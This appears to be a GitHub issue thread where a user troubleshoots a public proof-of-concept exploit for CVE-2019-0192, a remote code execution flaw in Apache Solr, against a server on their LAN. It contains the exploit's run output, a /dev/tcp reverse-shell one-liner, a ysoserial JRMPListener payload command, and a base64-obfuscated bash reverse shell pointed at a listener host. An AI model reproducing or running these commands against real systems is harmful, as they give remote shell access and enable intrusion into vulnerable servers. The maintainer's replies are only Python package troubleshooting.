CVE-2019-0192
CVE-2019-0192 copied to clipboard
mpgn
Trying to get reverse shell
Hi,
I've been trying lately to get reverse shell in my LAN on my vulnerable Apache Solr server with the PoC available in your github repo but for some reason I can't receive the reverse shell when triggering the python script:
root@localhost:/home/syrius/solr/CVE-2019-0192# python3 CVE-2019-0192.py http://192.168.1.142:8983
CVE-2019-0192 - Apache Solr RCE 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5
[+] Checking if ressource available => /solr/dovecot/config
command (not reflected)> 0<&196;exec 196<>/dev/tcp/192.168.1.101/1092; sh <&196 >&196 2>&196
[+] Copy file to tmp directory => Traceback (most recent call last):
File "CVE-2019-0192.py", line 59, in <module>
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
File "/usr/lib/python3/dist-packages/requests/api.py", line 88, in post
return request('post', url, data=data, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 44, in request
return session.request(method=method, url=url, **kwargs)
TypeError: request() got an unexpected keyword argument 'json'
root@localhost:/home/syrius/solr/CVE-2019-0192# * Opening JRMP listener on 1099
192.168.1.142 = Vulnerable Apache Solr in the LAN
192.168.1.101 = netcat listener on port 1092
Any help would be very appreciated,
Thanks
Hello,
Can you try to update your requests package:
pip3 show requests | grep Version
pip3 requests --upgarde
pip3 show requests | grep Version
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 show requests | grep Version
Version: 2.2.1
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 requests --upgrade
ERROR: unknown command "requests"
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 install requests --upgrade
Collecting requests
Downloading https://files.pythonhosted.org/packages/7d/e3/20f3d364d6c8e5d2353c72a67778eb189176f08e873c9900e10c0287b84b/requests-2.21.0-py2.py3-none-any.whl (57kB)
100% |████████████████████████████████| 61kB 1.6MB/s
Requirement already satisfied, skipping upgrade: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests) (3.0.4)
Requirement already satisfied, skipping upgrade: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests) (2.8)
Collecting urllib3<1.25,>=1.21.1 (from requests)
Downloading https://files.pythonhosted.org/packages/62/00/ee1d7de624db8ba7090d1226aebefab96a2c71cd5cfa7629d6ad3f61b79e/urllib3-1.24.1-py2.py3-none-any.whl (118kB)
100% |████████████████████████████████| 122kB 4.7MB/s
Requirement already satisfied, skipping upgrade: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests) (2018.11.29)
Installing collected packages: urllib3, requests
Found existing installation: urllib3 1.7.1
Cannot uninstall 'urllib3'. It is a distutils installed project and thus we cannot accurately determine which files belong to it which would lead to only a partial uninstall.
root@localhost:/home/syrius/solr/CVE-2019-0192# pip3 show requests | grep Version
Version: 2.2.1
allright will dig to find a way to upgrade and come back to let you know if all is working fine, thanks !
all good, getting connection from the JRMP listener. Trying to get rev shell but no connections yet from netcat listener. Syntax should be (I believe) :
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "0<&196; exec 196<>/dev/tcp/IP/PORT; sh <&196 >&196 2>&196"
yep simple cmd works, now rev shell is a little bit more challenging, might need to do something similar to:
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAxLzEzMzcgMD4mMQ==}|{base64,-d}|{bash,-i}"